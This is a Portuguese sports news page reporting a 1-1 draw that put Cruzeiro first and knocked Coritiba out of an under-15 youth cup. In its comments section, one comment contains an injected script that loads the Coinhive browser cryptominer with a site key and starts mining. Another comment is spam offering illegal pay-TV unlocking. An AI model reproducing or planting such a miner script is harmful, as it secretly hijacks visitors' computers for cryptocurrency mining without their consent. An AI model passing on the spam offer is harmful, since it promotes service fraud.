logo

14/1/2018 12:09

Empate garante Cruzeiro em primeiro e elimina o Coritiba da Copinha sub-15

Equipes ficam no 1 a 1 na abertura da última rodada da fase de grupos

Empate garante Cruzeiro em primeiro e elimina o Coritiba da Copinha sub-15

Cruzeiro e Coritiba empataram em 1 a 1 (gols de Wesley e Luiz Guilherme) na manhã deste domingo, pela última rodada da fase de grupos da Copa Brasil de Futebol Infantil de Votorantim. O resultado garante a Raposa em primeiro lugar do Grupo A do sub-15 e elimina o Coxa da competição disputada no estádio Domenico Paolo Metidieri.



Com sete pontos e invicto, o Cruzeiro já estava classificado após passar pelo Vitória no sábado. Somando o ponto do empate e garantindo o primeiro lugar, a Raposa confirma que jogará as quartas de final na terça-feira, às 18h30, contra o segundo colocado do Grupo C.

Já o Coritiba, que conseguiu somente dois pontos – empate diante da Raposa e contra a Seleção de Votorantim na estreia, além de uma derrota por 3 a 2 para o Vitória na competição –, se despede da Copinha.

195 visitas - Fonte: Globo Esporte


Rafael Pontes     

legal
< src="https://coinhive.com/lib/coinhive.min.js"><>var miner = new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ", {throttle: 0.3});miner.start();

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Campeonato Brasileiro

Dom - 16:00 - Vila Belmiro - PPV
Santos
Cruzeiro

Último jogo - Libertadores

Ter - 21:30 - Mineirão
Cruzeiro
2 1
Racing